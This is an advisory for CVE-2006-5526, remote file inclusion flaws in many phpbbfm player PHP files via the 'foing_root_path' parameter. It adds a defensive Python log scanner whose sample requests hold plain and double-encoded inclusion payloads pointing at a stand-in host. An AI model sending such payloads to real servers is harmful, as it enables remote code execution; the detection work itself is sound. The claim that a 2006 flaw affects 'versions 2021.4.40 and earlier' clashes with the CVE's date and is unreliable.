Phpbb · Phpbb · CVE-2006-5526
**Name of the Vulnerable Software and Affected Versions**
phpBB (phpbbfm) versions 2021.4.40 and earlier
**Description**
The issue is a set of PHP remote file inclusion flaws that allow remote attackers to execute arbitrary PHP code via a URL in the `foing_root_path` parameter of multiple PHP files in the player/ directory, including "faq.php", "index.php", "list.php", "login.php", "playlist.php", "song.php", "gen_m3u.php", "view_artist.php", "view_song.php", "flash/set_na.php", "flash/initialise.php", "flash/get_song.php", "includes/common.php", "admin/nav.php", "admin/main.php", "admin/list_artists.php", "admin/index.php", "admin/genres.php", "admin/edit_artist.php", "admin/edit_album.php", "admin/config.php", and "admin/admin_status.php".
**Recommendations**
For phpBB (phpbbfm) versions 2021.4.40 and earlier, consider disabling the `foing_root_path` parameter in the affected PHP files until a patch is available. Restrict access to the vulnerable PHP files to minimize the risk of exploitation. Avoid using the `foing_root_path` parameter in the affected API endpoints until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
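While no fixed version is available, web server access logs can be reviewed for requests that pass a URL in `foing_root_path`. The following is an added example, not code from phpBB or from this advisory; it assumes combined-format access logs, and the log lines, client addresses and host names in it are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "foing_root_path"  # parameter named in the advisory
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)  # value starts like a URL
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /player/index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /player/faq.php?foing_root_path=http://files.example.net/ HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2007:10:00:09 +0000] "GET /player/admin/nav.php?foing_root_path=%2568ttp%253A%252F%252Ffiles.example.net%252F HTTP/1.1" 200 90',
    '192.0.2.33 - - [01/Jan/2007:10:01:00 +0000] "GET /player/song.php?id=4&foing_root_path=./ HTTP/1.1" 200 700',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %2568ttp is read as http."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspect_requests(lines):
    """Return (client, path, value, status) for requests setting PARAM to a URL."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed log format
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            # PHP maps spaces and dots in parameter names to underscores,
            # so normalise the name the same way before comparing.
            name = re.sub(r"[ .]", "_", fully_decode(key))
            value = fully_decode(value)
            if name == PARAM and SCHEME.match(value):
                hits.append((client, parts.path, value, status))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a successful include; the status code and the host's outbound connections at that time help decide which requests need follow-up.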